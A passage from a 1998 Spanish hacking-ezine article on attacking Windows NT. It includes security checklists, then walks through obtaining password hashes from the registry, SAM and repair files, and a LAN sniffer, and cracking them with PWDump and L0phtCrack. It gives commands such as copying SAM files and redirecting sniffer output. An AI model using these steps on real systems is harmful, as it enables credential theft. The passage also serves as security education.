TOP
AutoresTOTAL
LecturasSET 15
119158 visitas
- Contenidos - SET Staff
- Editorial - Editor
- Noticias - Rufus T. Firefly
- 050 - ArMaND VanHell
- IRC War - OmiKroN
- IPV6 - Tyako
- En linea con... GuyBrush - Paseante
- Tabla de tiempos del John the Ripper 1.4 - +NetBul
- Proyectos, peticiones, avisos - SET Staff
- Este banco esta ocupado - FCA000
- Los bugs del mes - SET Staff
- La red global de IBM - FCA000
- La vuelta a SET en 0x1D mails - SET Staff
- Introduccion a Iberpac III - El Nuevo Eljaker
- Curso de Novell Netware -II y III- - Madfran
- Hacking NT v 1.0 - Chessy
- NTFS - Falken
- Lo hice por todos vosotros... - Traduccion
- Despedida - Editor
- Fuentes Extract - SET Staff
- Llaves PGP - SET Staff
Hacking NT v 1.0
Autor: Chessy
-[ 0x0F ]-------------------------------------------------------------------- -[ Hacking NT v 1.0 ]-------------------------------------------------------- -[ by Chessy ]--------------------------------------------------------SET-15- _ _ __ _____ /\ /\ __ _ ___ | | __(_) _ __ __ _ /\ \ \/__ \ / /_/ / / _` | / __|| |/ /| || '_ \ / _` | / \/ / / /\/ / __ / | (_| || (__ | < | || | | || (_| | / /\ / / / \/ /_/ \__,_| \___||_|\_\|_||_| |_| \__, | \_\ \/ \/ |___/ __________________________________________________________________________ Hacking NT v1.0 por Chessy, 8 de Mayo de 1998. 'Remember, before asking a question, always try to answer yourself first' __________________________________________________________________________ Basandome en un esqueleto de texto fruto de la traducci¢n del articulo de la ezine The Havoc Technical Journal n§ 13, por WaRsPrItE, y docs del grupo Rhino9, Technotronic, The Gnome NT Hacking FAQ y diversos articulos del CERT, CIAC, listas de distribucion NTBugTraq, BugTraq, NTSecurity, AntiOnline, Rootshell, ezines Saqueadores, Phrack, JJFHackers, libros Maximum Security, Manual de Seguridad de Windows NT, la web de Microsoft sobre seguridad, el documento Hardening NT, articulos de seguridad en la revista PC Actual y cientos de referencias extraidas de la Web. Para mas detallada informacion sobre la bibliografia se ha incluido el Apendice A. Copywrong ž Chessy'98. All disclaimers applied. Licencia de uso y distribucion en <disclaim.txt> que acompa€a al zip de SET 15. Contenido 1. Seguridad en Sistemas Distribuidos basados en Windows NT.......... 1.1. šPor que preocuparse de la seguridad?............................. 1.1.1. El Crecimiento de Internet vs. Ataques en Internet.................. 1.2. šMerece la pena el esfuerzo de centrarse en NT?....................... 1.3. Ataques a Windows NT. Una taxonomia de los posibles ataques............ 1.4. Defensas en Windows NT. Una taxonomia de las posibles defensas......... 2. Basico. Como y donde conseguir el fichero de passwords................... 2.1. Accediendo a los passwords........................................... 2.1.1. Volcandolos desde el Registro........................................ 2.1.2. Extrayendo los password hashes de un fichero SAM..................... 2.1.3. Usando un Sniffer en la red local.................................... 3. Hacking & cracking de passwords. PWDump & L0phtCrack..................... 3.1. Informacion sobre el volcado de Passwords en NT con la utilidad PWDump. 3.2 Como usar la utilidad PWDump....................................... 3.3. Como funciona PWDump................................................ 3.4. El codigo fuente de PWDump.......................................... 3.5. Informacion sobre el crackeo de Passwords en NT. La utilidad L0phtcrack 3.5.1. L0phtcrack. Crackeo de passwords con encriptacion LANMAN y/o MD4..... 3.5.2. šPor que es tan importante ser capaz de atacar solo claves MD4?..... 3.5.3. Rendimiento de L0phtcrack........................................... 3.5.4. Donde conseguir la herramienta L0phtcrack........................... 4. Introduccion a NetBIOS............................................ 4.1. šQue es NetBIOS?....................................................... 4.2. Servicio de Nombres en NetBIOS......................................... 4.3. El servicio de 'Session' NetBIOS....................................... 4.4. Datagramas NetBIOS..................................................... 5. Vulnerabilidades NetBios. NAT..................................... 5.1. El comando NBTSTAT..................................................... 5.2. Introduccion a los comandos NET........................................ 5.3. Una sesion de ataque NetBIOS mediante el uso de NET VIEW y NET USE..... 5.4. Una sesion de ataque NetBIOS mediante el uso de NAT.EXE................ 6. Vulnerabilidades en Internet Information Server (IIS)............. 6.1. Entrando por la puerta trasera......................................... 6.2. El ataque Pipe HTTP/FTP................................................ 6.3. Otros ataques al IIS................................................... 6.4. Conclusion a los ataques IIS........................................... 7. Ataques tipo D.o.S. (Denial of Service)........................... 7.1. Ataque OOB...................................................... 7.2. Ataques Teardrop I y II, NewTear, Bonk, Boink................... 7.3. Ataque Land..................................................... 7.4. Ataque Smurf.................................................... 8. El vulnerable Registro de Windows NT.............................. 8.1. šQue es el registro?................................................... 8.2. šQue son los 'hives'?.................................................. 8.3. Los fallos del registro................................................ 8.4. Acceso remoto al registro.............................................. 9. Spoofing (un ataque comun a otros sistemas)......................... 9.1. Introduccion. IP Spoofing & DNS Spoofing............................... 9.1. DNS Spoofing........................................................... 10. Otros ataques via Web............................................... 10.1. Ataques por JavaScript, VBScript............................... 10.2. Ataques por vulnerabilidades en los navegadores................ 10.3. Ataques por Java............................................... 10.4. Ataques por ActiveX............................................ 11. Medidas de seguridad Service Pack & HotFix.......................... 11.1. Como parchear el sistema. Service Pack & Hot-Fix...................... 11.2. Listado de Service Pack 3 & Hot-Fix-post-SP3.....[no incluido]........ 12. Escaneadores de puertos TCP/UDP. Paranoic........................... 12.1. El arte del escaneo de puertos TCP.................................... 12.2. Introduccion.......................................................... 12.3. Tecnicas.............................................................. 12.4. šQue tecnica usa Paranoic?............................................ 13. Apendice A. Bibliografia............................................ 14. Apendice B. El fichero de passwords de prueba....................... 15. Apendice C. Los resultados del crackeo de passwords................. 16. Apendice D. Encuesta y perfil de 100 conocidos hackers.............. 1. Seguridad en Sistemas Distribuidos basados en Windows NT. 1.1. šPor que preocuparse de la seguridad? Desde 1990 hasta nuestros dias, el CERT (Computer Emergency Response Team), un grupo de seguridad internacional especializado en dar respuesta a las empresas y organizaciones que denuncian ataques informaticos a sus sistemas de informacion, viene desarrollando una serie de estadisticas y datos que demuestran que cada dia se registran mas y mas ataques informaticos. No solo eso; debido al cada vez mayor conocimiento de la tecnologia actual por parte de los atacantes (hackers) y a las grandes posibilidades de distribucion e intercambio de la informacion en la propia Internet, estos ataques cada vez son mas sofisticados, automaticos y dificiles de rastrear. A todo ello se une el auge que a las puertas del siglo XXI tiene el mundo de la seguridad informatica. Cualquier crio de 15 a€os (script kiddies), sin tener grandes conocimientos, pero con una potente y estable herramienta de ataque desarrollada por expertos hackers, es capaz de dejar fuera de servicio cualquier servidor de informacion de cualquier organismo en Internet, simplemente siguiendo las instrucciones que acompa€an la herramienta. Recientemente, hemos visto, escuchado y leido por todos los medios de comunicacion, noticias sobre la detencion de varios grupos de hackers, incluido uno espa€ol (Mentes Inquietas), acusados de haberse infiltrado en sitios, en principio tan inviolables y bastiones de seguridad, como el Pentagono o la NASA. Es evidente que la prensa, radio, television, los gobiernos y los cuerpos de seguridad del Estado (norteamericano FBI, o espa€ol Guardia Civil) que intervinieron en estas detenciones magnifican la noticia en busca de una audiencia cada vez mas escasa o de un reconocimento de su habilidad. En ocasiones, ademas, provocan una actitud de desprecio y miedo a uno de los mayores descubrimientos de la Humanidad, Internet, debido al desconocimiento de gran parte de esa audiencia de las ventajas (no solo inconvenientes) que reporta la red de redes. Este estudio no pretende alarmar a nadie ni sembrar la semilla del futuro hacker, sino servir de informacion a todo aquel minimamente interesado en proteger su/s sistema/s informatico/s. Evidentemente, la informacion puede ser aprovechada para fines menos licitos, pero es algo que nunca se podra evitar y que ciertamente, tampoco me importa. La mayor parte de la buena informacion sobre seguridad se encuentra en los sitios de grupos de hacking, underground y cyberpunks que pueblan Internet. Sin su ayuda, este trabajo no hubiera sido posible, o hubiera bajado muchos puntos de calidad. Segun las estadisticas del CERT el numero de incidentes declarados bajo de 2573 en 1996 a 2134 en 1997. Esto puede ser debido a muchas causas, pero no necesariamente a que haya bajado el numero de ataques: a) Las empresas u organizaciones no se pueden permitir el lujo de denunciar ataques a sus sistemas, pues el nivel de confianza de los clientes (ciudadanos) bajaria enormemente. šQue pensaria un cliente de un banco si este declara que cada a€o sufre 200 ataques informaticos, aunque ninguno de ellos hubiese terminado exitosamente para el atacante? šQue pensarian los ciudadanos de los EEUU si el Pentagono anunciase cada uno de los cientos de ataques que sufren a lo largo del a€o? (Hay que notar que este lugar, es una de las pruebas de fuego para todo hacker). b) Cada vez mas, los administradores tienen una mayor conciencia respecto de la seguridad de sus sistemas y arreglan por si mismos las deficiencias detectadas. A esto hay que a€adir las nuevas herramientas de seguridad disponibles en el mercado y las nuevas empresas dedicadas a este tema que han surgido a lo largo de los a€os. c) El propio CERT ha tenido que lanzar cada a€o mas 'advisories' (documentos explicativos) sobre los nuevos agujeros de seguridad detectados y la forma de solucionarlos, pasando de 15 advisories y 2 boletines especiales en Diciembre de 1994 a 28 advisories y 16 boletines en Diciembre de 1997. 1.2. šMerece la pena el esfuerzo de centrarse en NT? Nada mejor que un nuevo par de estadisticas graficas para demostrar que efectivamente, Windows NT es un sistema operativo de red (orientado cada vez mas a Internet) con futuro. Eso si, siempre con el permiso de los nuevos sistemas operativos Inferno y en especial LiNUX, sistema operativo de red muy estable y GRATUiTO, que estan adoptando cada vez mas y mas empresas, en especial aquellas que quieren ofrecer servicios Web, al disponer de un servidor muy eficiente, estable y gratuito: APACHE. La ventaja de Microsoft hoy en dia, es que puede ofrecer servicio tecnico, y que muchas empresas desconfian de una de las mayores ventajas de LiNUX, su gratuidad, ademas de la facilidad de instalacion de un sistema NT vs. uno LiNUX. [NOTA: Recordad que en esta version ascii no se pueden ver los graficos, para leer el documento completo y original (version Word) podeis recogerlo en la web de SET] Una nueva nota, que no hace m s que alejar cualquier atisbo de duda: [7-VI-98] PC-Actual n§ 97, Secci¢n Actualidad/Mercado V Encuesta de Satisfacci¢n de Usuarios de Computing 812 grandes empresas espa€olas opinan sobre el S.O. utilizado El semanario europeo de tecnolog¡as de la informaci¢n Computing ha publicado recientemente su V encuesta de satisfacci¢n de usuarios, realizada por CB Consulting. En ella han participado 812 directores de inform tica de empresas con una facturaci¢n superior a los 1000 millones de pesetas. Tres sistemas operativos se reparten el favor de los grandes usuarios: HP/UX, OS/400 y Windows NT con una cuota de mercado que oscila entre el 19% del primero y el 15% del ultimo. Eso s¡, la proyecci¢n de NT es imparable.El 42% de los encuestados afirm¢ que su sistema operativo futuro ser Windows NT, frente a un 12% Unix y un 5'7% HP/UX (OS/400 ser¡a la elecci¢n futura de un 3'8%). M s informaci¢n: http://www.bpe.es/computing 1.3. Ataques a Windows NT. Una taxonomia de ataques genericos. Veamos primero una posible taxonomia de los ataques a redes y ordenadores en general. Del capitulo 6 de la tesis. Atacantes Hackers Espias Terroristas Criminales Vandalos Espionaje Profesionales (Crackers) Industrial Herramientas Linea de Script o Agente Herramientas Herramientas Intervencion de Comandos Programa Autonomo Integradas Distribuidas comunicaciones Metodos de acceso Vulnerabilidades Vulnerabilidades Vulnerabilidades Acceso o uso en implementacion en dise€o en configuracion no autorizado Procesa ---> Flujo de datos | Ficheros Resultados Corrupcion de Revelacion de Acceso a servicios Denegacion de informacion. informacion no autorizados servicios Objetivos Desafio Ganancia Ganancia Da€ar Politica Financiera 1.3. Ataques a Windows NT. Una taxonomia de ataques especificos a NT. D.O.S (Denegacion de servicio) === Teardrop Land Spoofing == DNS Spoofing IP Spoofing 'Man in the middle'== Web Spoofing Ataques al registro == L0pthcrack RedButton Ataques de Red == NetBIOS NAT Ataques de diccionario == Ataque via Samba Ataque via IIS Bugs del sistema NT == GetAdmin Ataques a servidores Web. == IIS Bug 8+3 Sondeos == Puertos DNS Bugs en la seguridad de las aplicaciones == Buffer Overflow FTP Bounce Attack Ataques con tecnologias Web == Bug JavaScript Bug RadiactiveX Troyanos == FPNWCLNT.DLL MSGINA.DLL ("Graphical Identification and Autorization") Ataques Locales == Ataques a las aplicaciones. == NTFSDOS.EXE ROLLBACK.EXE Sniffers == L0phtcrack Asmodeus 1.4. Defensas en Windows NT. Una taxonomia de las posibles defensas. Las posibles acciones correctivas, se presentan aqui a modo de checklist, debido a que muchas veces, para solucionar distintos tipos de ataque, se deberian seguir metodos de correccion similares. Por ello, lo ideal seria repasar una lista generica de chequeo y comprobar que se han intentado todos los metodos aqui expuestos antes de implicar a organismos como el CERT u otros relacionados con la seguridad informatica. 1. Modificar el codigo fuente del programa que falla. 2. Filtrado de paquetes (sin necesidad de firewall). PanelControl/Protocolos/Avanzada. 3. Encriptar la informacion que fluye por la red. 4. Utilizar otro sistema operativo u otro ordenador. 5. Esperar un hotfix de Microsoft (requiere tiempo). 6. Configurar bien el firewall (o instalar uno). Como minimo se debe negar el acceso desde el exterior a los puertos comprendidos entre el 135 y el 139 (NetBIOS) tanto para TCP como UDP. 7. Actualizarse a la ultima version del programa/aplicacion vulnerable. 8. Deshabilitar los servicios que no se usen (ejemplo: los Simple TCP/IP Services, como echo, chargen, QOTD,...) 9. Instalar el ultimo Service Pack disponible (actualmente el SP3, pero esta a punto de salir el 4). 10. Editar el Registro de NT (regedit, regedt32). Lee el apartado dedicado a las vulnerabilidades del registro de Windows NT. 11. Auditar el sistema (estudiar los logs para identificar al atacante). 12. No permitir arranque desde disquete, ni arranque dual (evitando asi el acceso a los volumenes NTFS). 13. Utiliza un escaneador de vulnerabilidades (que no sea de Microsoft) regularmente, y pasa antivirus siempre que puedas. 14. Eliminar el servicio vulnerable (solucion drastica) 15. Pedir ayuda en las distintas listas de distribucion, news, IRC, Web para conseguir mas informacion. 16. Usar la version USA de NT para acceder mas rapidamente a los hotfix. 17. Lee todas las paginas Web que aparecen en el apendice. Frecuentemente. 18. Suscribete a las listas de distribucion que aparecen en el apendice de este documento y lee los foros de noticias relacionados con la seguridad que tambien se citan. Diariamente. 19. Suscribirse a la pagina de NTBugtraq para recibir actualizaciones de los nuevos parches 2 horas despues de su publicacion. 20. Restringir el acceso al soft/hard del sistema, tanto fisica como logicamente. 21. Consultar todos los documentos y manuales de la aplicacion. 22. Configurar adecuadamente los ACL (Access Control List) 23. Usar el Kit de Recursos de NT (alguna accion correctiva ya esta implementada en alguna herramienta de este kit). 24. Deshabilitar la posibilidad de conexion remota al servidor en las workstations de la red. 25. Formatear el disco con el modelo NTFS 26. Quitar todos permisos de lectura al grupo Everyone del registro. 27. Usar el servicio de auditoria que ofrece NT (sobre todo si ofrecemos servicios Internet) 28. Asegurarse de que los ficheros solo tienen permisos de lectura y ejecucion. Intentar separar los ficheros publicos de los privados. 29. Crea una politica restrictiva de passwords con la ayuda del User Manager. 30. Deshabilita la opcion que muestra el ultimo usuario conectado cuando se inicia una sesion. 31. Inserta un banner para cuando un usuario comienza una sesion, que indique que todas sus acciones seran auditadas. Hazlo si no quieres perder un juicio seguro (el intruso puede alegar que sus acciones no podian ser auditadas al no habersele avisado antes !) 32. Deshabilita el derecho de conexion "Acceso a este ordenador desde la red" que se le concede a los administradores en los controladores de dominio. 33. Si puedes, deshabilita el servicio de Scheduler (planificador). El Scheduler puede utilizarse para ejecutar programas con permisos de sistema. 34. Restringe el acceso a ciertos ejecutables que creas peligrosos (posiblemente CMD.EXE o NTBACKUP.EXE) 35. Instala los servidores Web, Ftp, Gopher... TRAS (fuera de) EL FIREWALL. 36. Cambia el nombre de login del 'Administrador'. Si no lo haces, el intruso siempre podra atacar esta cuenta por medio de un ataque de diccionario o fuerza bruta. 37. Estudia todo lo que puedas sobre como configurar bien un firewall y las diferentes opciones que existen. 38. Lee los logs diariamente. usalos como una guia pero no confies ciegamente en ellos. No todo lo que ocurre en el ordenador esta en los logs. Investiga todo lo que consideres extra€o. Ademas, una vez identificado un ataque/atacante, se pueden llevar a cabo las siguientes acciones externas: * Medidas contra el intruso: + Avisarle + Arrestarlo + Multarle * Acciones legales contra el intruso: + Tracear + Investigar + Contratar un servicio secreto + Enjuiciar + Llamar a la policia Para finalizar, nunca te dejes llevar por el panico, pero se paranoico. Tomate todos los eventos relacionados con la seguridad y todos los indicios de ataque seriamente, y cuando estes seguro de que algo raro pasa y no puedas resolverlo por tu cuenta, contacta con el CERT y/o con el grupo de seguridad de Microsoft 2. Basico. Como y donde conseguir el fichero de passwords. 2.1. Accediendo a los passwords. Antes de que los passwords puedan ser procesados (crackeados), necesitas conseguir los password hashes (trozos de password encriptados pero en formato texto ASCII, los 'password hashes' en jerga anglosajona). Principalmente, existen 3 metodos: directamente del registro, de un fichero SAM en disco o mediante el uso de un sniffer. 2.1.1. Volcandolos desde el Registro. Si tienes privilegios de administrador puedes conseguir los passwords encriptados usando la opcion "Tools Dump Passwords from Registry' de la utilidad L0phtcrack (comentada en el capitulo III). Especifica el nombre de un ordenador o la direccion IP con el formato tipico de MS \\nombre_ordenador o \\direccion_IP. Sin embargo, NT puede ser configurado para prohibir el acceso al registro de forma remota a traves de la red, por lo que necesitaras estar conectado de forma local a la maquina que quieras hackear. Ademas Microsoft ha introducido la utilidad SYSKEY en el Service Pack 3 de Windows NT. Si esta utilidad esta ejecutandose en el sistema objetivo los password hashes estaran encriptados y no podran ser extraidos de esta manera. Si usas la version espa€ola de NT, la palabra Administrator se cambia por Administrador; debido a esto, es necesario modificar una clave del registro para conseguir que la opcion 'Dump Passwords' funcione. Ejecuta regedit.exe y edita el valor de la siguiente clave: HKEY_CURRENT_USER\Software\L0pht\L0phtCrack\AdminGroupName Inicializala al valor 'Administrador'. 2.1.2. Extrayendo los password hashes de un fichero SAM. El siguiente metodo es una novedad de la version L0phtCrack 2.0. Puedes extraer los password hashes del fichero SAM del disco duro, del Disco de Reparacion de Emergencia de NT o de una cinta de backup. El Registro de NT actualmente esta almacenado en diferentes ficheros del disco de sistema, en el directorio d:\winnt\system32\config. No se puede acceder a estos ficheros mientras NT este ejecutandose dado que estan abiertos en exclusiva por el sistema operativo. Si tienes acceso fisico al sistema, puedes arrancar el ordenata con un disquete DOS y usar un programa como NTFSDOS (que puede conseguirse en http://www.ntinternals.com/ntfs20r.zip) para copiar el fichero SAM de d:\winnt\system32\config a un disquete. Despues puedes usar el comando 'File Import SAM' para extraer los password hashes del fichero que acabas de conseguir. Otro lugar donde encontrar el fichero SAM que no requiere rebotar la maquina es en el directorio d:\winnt\repair o en el disco de Rescate de Emergencia. Cada vez que se hace un disco de rescate, los contenidos de la rama SAM del registro son salvados y comprimidos en el fichero 'sam._'. Este fichero puede ser descomprimido con el comando: expand sam._ sam El fichero SAM descomprimido puede ser importado por L0phtCrack. El fichero SAM tambien es guardado en las cintas de copia de seguridad cuando se hace un backup del sistema. Si tienes acceso a una cinta de backup, puedes restaurar el fichero SAM de d:\winnt\system32\config a otra maquina e importarlo en L0phtCrack. Si la utilidad SYSKEY del SP3 de NT 4.0 esta instalada, todos los ficheros SAM estan encriptados y no podran ser leidos por L0phtCrack. 2.1.3. Usando un Sniffer en la red local. Si esta instalado SYSKEY y no tienes ni acceso remoto ni acceso fisco, existe otra posibilidad para obtener los password hashes: usar un sniffer. Esto requiere que tu ordenador este en el mismo segmento de red que el objetivo de nuestro ataque. El sniffer incluido con L0phtCrack 2.0, readsmb.exe, solo funcionara en Windows NT 4.0. Antes hay que instalar un driver de red NDIS (si sigues las instrucciones de instalacion del programa no tendras ningun problema.) El sniffer es un programa con interfaz de linea de comandos (ventana MSDOS) llamado readsmb.exe. Ejecutalo y redirige su salida a un fichero con el comando: readsmb > passwd Si lo dejas un dia o mas ejecutandose, seguro que recolectas suficientes passwords. Despues puedes abrir el fichero generado con el comando 'File Open' de L0phtCrack. 3. Hacking & cracking de passwords en NT. PWDump & L0phtCrack. Lo primero de todo, me gustaria decir que creo que la conjuncion de 'PWDump' con 'L0phtCrack' es una excelente herramienta de seguridad para chequear la seguridad de redes basadas en Windows NT. Sin embargo, de la misma manera que ocurria con el ahora famoso y sobrevalorado 'SATAN', no es la llave maestra de ninguna red NT. Como siempre digo en todos los articulos que escribo, la clave siempre esta en lo mas basico. Si los usuario eligen buenos passwords, sera practicamente imposible crackearlos. Por ejemplo, si cuando eliges un password, usas tanto mayusculas como minusculas y numeros, existen 1.240176943466 x 10(25) posibles combinaciones. Ahora a€adele alguna puntuacion decimal a ese numerito! Recuerda que en NT el password puede ser hasta de 14 caracteres, a diferencia de los 8 unicos caracteres que se pueden elegir en los sistemas UNIX. No hace falta decir que los ataques de fuerza bruta son inabordables ante un password bien elegido en cualquiera de los dos sistemas. Los dos programas que se suelen usar para atacar los passwords en NT son L0phtCrack y PWDump. Debo decir que PWDump [escrito por Jeremy Allison, jra@cygnus.com, para el proyecto SAMBA] funciona muy bien. Siempre que tengas privilegios de administrador. Pero, entonces, špor que usarlo para propositos de hacking?! Porque trabaja con cualquier copia del registro. Asi, cualquier copia de seguridad del servidor que quieras piratear puede tener una copia del registro del sistema. El ejemplo del hackeo del servidor NT que se muestra en este documento fue gracias a la ineficacia del administrador del sistema, el cual permitia a los usuarios de Dominio conectarse de forma local en el servidor. Durante la instalacion del sistema, NT pregunta si quieres realizar un disco de rescate (rdisk.exe) y la eleccion por defecto es "Si". Cada vez que ejecutas rdisk.exe, NT guarda una copia del registro en %SystemRoot%\Repair (donde %SystemRoot% es el directorio del sistema, normalmente d:\winnt ). Y los permisos por defecto de ese directorio son de "lectura" para todos los usuarios. Ahora ya es muy sencillo conseguir una copia del registro. El unico problema es que todos los passwords que hayan sido cambiados desde la ultima vez que se ejecuto rdisk.exe no funcionaran (evidentemente, pero este es un problema menor). Ahora que disponemos de una copia del registro, como podemos extraer de ella la rama de los passwords? Bien, busca una maquina NT de la cual seas "Administrador", y ejecuta PWDump.exe (normalmente, se suele tener una copia de NT en el ordenador de casa para experimentar ahi antes de llevar los ataques a la practica). PWDump.exe volcara toda la informacion de los passwords contenida en el registro a un fichero de texto. Despues de eso es muy sencillo, solo falta ejecutar L0phtCrack.exe con tu diccionario de palabras favorito o usar el programa en modo de fuerza bruta. Llevo 6 dias en un Pentium 133 conseguir 3 cuentas (con la rev. 1.0). Sorprendentemente, eran passwords de 6 caracteres de longitud, osea, muy pobremente elegidos. Para mas info sobre como y donde conseguir el fichero de passwords, ver el capitulo II. 3.1. Informacion sobre el volcado de Passwords en NT con la utilidad PWDump. Esta util herramienta es capaz de volcar la base de datos de los passwords almacenados en una maquina NT, localizada en el registro de NT (bajo la rama HKEY_LOCAL_MACHINE\SECURITY\SAM\Domains\Account\Users) in un fichero con formato smbpasswd. Esta funcionalidad esta dise€ada para ayudar a los administradores de maquinas UNIX con capacidad de compartir ficheros e impresoras con maquinas NT mediante el programa Samba (como puede hacerse con LiNUX). Estos administradores a menudo necesitan sincronizar (sync) la base de datos maestra de un su sistema NT, donde guardan una copia de todos los passwords, con el fichero de passwords smbpasswd del servidor UNIX/Samba. Esta utilidad vuelca, con el siguiente formato, las entradas de passwords del sistema NT: <user>:<id>:<lanman pw>:<NT pw>:comment:homedir: Donde <user> es el nombre de usuario en Windows NT, <id> es el RID de Windows NT (ID relativo) - el ultimo componente de 32 bits del SID de los usuarios de Windows NT, <lanman pw> es el hash del password del usuario usando codificacion lanman, <NT pw> es el hash del password del usuario usando codificacion md4 -notese que si el usuario no tiene password este sera volcado como la cadena de caracteres 'NO PASSWORD*****', si la cuenta esta deshabilitada o no es valida, se volcaran 32 asteriscos '*'. El apartado :comment es una concatenacion del nombre completo del usuario en Windows NT y el campo de descripcion en el programa user-manager de Windows NT. El homedir (directorio raiz del usuario) por desgracia, no puede contener caracteres ':', dado que estos son usados como separadores de campo en el fichero smbpasswd (como en UNIX). Por eso, todos los caracteres ':' que vengan tras los caracteres que identifiquen las unidades de disco son volcados como caracteres de subrayado '_'. 3.2. Como usar la utilidad PWDump. Solo como una sugerencia, recomendaria volcar los passwords de tus maquinas NT y despues crear usuarios UNIX normales (en /etc/passwd) con los mismos numeros de cuenta UNIX que sus RID en NT - esto hara que replicar el fichero smbpasswd sea una tarea mas sencilla un poco mas tarde. Estas cuentas /etc/passwd podrian tener las entradas de password deshabilitadas, prohibiendo asi a los usuarios NT conectarse al servidor UNIX mendiante una sesion telnet (esto es algo similar a quitar el permiso 'Conectarse de forma local' en un servidor NT). El fichero smbpasswd creado podria copiarse luego al fichero $SAMBA/private/smbpasswd (donde $SAMBA es el directorio raiz de la instalacion Samba). Si Samba esta configurado para seguridad a nivel usuario y encriptacion de passwords (inicializa la siguiente variable: security = user encrypted passwords = yes en tu fichero smb.conf) entonces los usuarios de Windows NT/95 conectados al dominio NT seran capaces de acceder de manera transparente a los recursos en la maquina Samba dado que disponen de un id de usuario UNIX correcto (el mismo que acabas de crear). Despues puedes configurar un trabajo 'AT' en el servidor NT para volcar periodicamente la base de datos de los passwords en nuevo fichero smbpasswd y sobreescribirlo en el servidor Samba para mantener las bases de datos de passwords de los dos servidores sincronizadas. La utilidad PWDump.exe puede tomar como argumento un \\nombre_de_maquina, procediendo al volcado de la base de datos con los passwords de dicha maquina en lugar de la maquina local, siempre y cuando se dispongan de los suficientes privilegios para hacerlo. Por defecto, siempre volcara la base de datos con los passwords de la maquina local. NOTA: Los passwords volcados por esta utilidad son equivalentes a los 'passwords en texto ASCII' del protocolo CIFS y deben ser protegidos. La seguridad UNIX en el fichero smbpasswd debe ser inicializada de la siguiente forma: Owner root, permisos rw------- , es decir, lectura/escritura para el propietario del fichero, (como hemos dicho, sera el root) y ningun tipo de acceso al resto del mundo. 3.3. Como funciona PWDump. Esta utilidad se esfuerza por mantener la seguridad en NT dado que enreda con las ramas SAM del registro NT. Ademas, nunca se ejecutara si no posees permisos de Administrador. Primeramente, PWDump realiza los minimos cambios necesarios para permitir al programa leer las entradas de passwords. Vuelca todas las entradas de los usuarios (analiza el codigo fuente para los detalles) y despues vuelve sobre sus pasos para restaurar en el registro todas las caracteristicas de seguridad de todas las claves que ha tocado. He testeado este codigo en un servidor y una estacion de trabajo NT 4.0 y nunca he tenido problemas, pero como siempre, este codigo no tiene ninguna garantia. 3.4. El codigo fuente de PWDump. El codigo fuente para esta utilidad puede encontrarse en: ftp://samba.anu.edu.au/pub/samba/PWDump/PWDump.c Observese que este codigo necesita una libreria de encriptacion DES para compilar. La que he usado para este documento ha sido la excelente libreria DES de Eric Young que se puede encontrar en: ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-4.01.tar.gz que compila bien bajo Windows NT. Use Microsoft Visual C++ 4.x como entorno de compilacion. El codigo binario PWDump.exe tambien se puede encontrar en las paginas Web del proyecto Samba para aquellos que no dispongan de un compilador. El ejecutable es para plataformas x86 gobernadas por NT. 3.5. Informacion sobre el crackeo de Passwords en NT. La utilidad L0phtcrack. El grupo de hackers L0pht, concretamente mudge@l0pht.com y weld@l0pht.com , libero el 10 de Abril de 1997 la primera revision de la utilidad L0phtcrack, demostrando como crackear un password en NT. ( En los primeros meses de 1998, se libero la ultima version, la 2.0. que se puede descargar de http://www2.l0pht.com/users/10pht/lc2exe.zip ) Recuperando la salida de passwords en formato LANMAN o en el dialecto de encriptacion MD4 de Windows NT que volcaba 'PWDump' desde la rama SAM del registro, era capaz de descifrar bien por fuerza bruta o por ataques de diccionario los passwords que se le presentaran como entrada. Usando la salida de 'PWDump' y un diccionario, L0phtcrack es capaz de obtener: 1) solo los passwords LANMAN desencriptados 2) solo los passwords en el dialecto MD4 de NT desencriptados 3) tanto los passwords LANMAN como los MD4 (derivando los passwords MD4 de la salida LANMAN y probando a traves de las 2 a la N permutaciones). Tambien es posible usar el metodo de fuerza bruta y probar con todo el espacio de claves, recuperando todos los passwords de usuario de hasta 14 caracteres (recuerdese que el cuadro de dialogo de conexion de usuarios en Windows NT solo permite claves de 14 caracteres de longitud.) L0phtcrack puede ser usado ademas de 3 maneras diferentes: 1) Mediante un entorno grafico tipico de Windows. 2) Mediante un interface de linea de comandos (MS-DOS) 3) Modificando el codigo fuente, que viene junto con el programa ejecutable. Para una completa descripcion de como funciona la encriptacion LANMAN y MD4, consultar los excelentes documentos disponibles via web en www.ntbugtraq.com/Contributions/SAMAttack.asp www.ntbugtraq.com/Contributions/samfaq.asp 3.5.1. L0phtcrack. Crackeo de passwords con encriptacion LANMAN y/o MD4. LANMAN Pasando como parametro un diccionario, cada palabra sera encriptada usando el formato LANMAN con una pasada DES. A continuacion, la lista de usuarios se chequea contra esta palabra encriptada. Cualquier coincidencia sera presentada como un exito. MD4 Pasando como parametro un diccionario, cada palabra sera encriptada usando MD4. La lista de usuarios se chequea contra esta palabra encriptada y se marcaran las coincidencias. LANMAN y MD4 Pasando como parametro un diccionario, cada usuario sera contrastado contra la encriptacion de cada palabra usando el formato LANMAN con una pasada DES. Si se encuentra una coincidencia, la palabra se encripta con las 2 elevado a la longitud(palabra) permutaciones de mayusculas/minusculas posibles en MD4, para devolver el valor MD4 sensible a mayusculas/minusculas. Fuerza bruta Pasandole al programa una cadena con la lista de todos los caracteres validos posibles, se prueban todas las posibles combinaciones de hasta 7 caracteres de longitud (ver el por que solo 7 caracteres y no 14 en la explicacion de la encriptacion de passwords en Windows NT ]). La primera y la segunda mitad del password LANMAN son comparadas contra cada una de estas posibles combinaciones, devolviendo asi todos los passwords de hasta 14 caracteres que se hayan podido descifrar. Cuando se encuentre una coincidencia, la palabra es probada con las 2 elevado a longitud(palabra) posibles combinaciones. Cambiando la cadena de caracteres que se procesa por defecto, podemos reducir drasticamente la cantidad de tiempo empleada en un ataque de fuerza bruta al usar todo el espacio de posibles combinaciones. Recuerda que los siguientes caracteres no son validos en un password, por lo que no necesitan ser incluidos: '/', '\', '[', ']'', ':', ';', '|,' ,'=', ',','+', '*', '?', '<', '>' (de acuerdo a la informacion que Microsoft facilita). Por ejemplo, si lo unico que quieres es chequear todas las posibles combinaciones de letras del alfabeto, te basta con pasarle la cadena ABCDEFGHIJKLMNOPQRSTUVWXYZ como argumento. 3.5.2. šPor que es tan importante ser capaz de atacar solo claves MD4? El ataque o crackeo de passwords solo en formato MD4, sin usar LANMAN, es evidentemente mucho mas lento que crackear el password en formato LANMAN y despues probar todas las combinaciones de mayusculas/minusculas. Los cambios producidos en la especificacion CIFS (Common Internet File System) 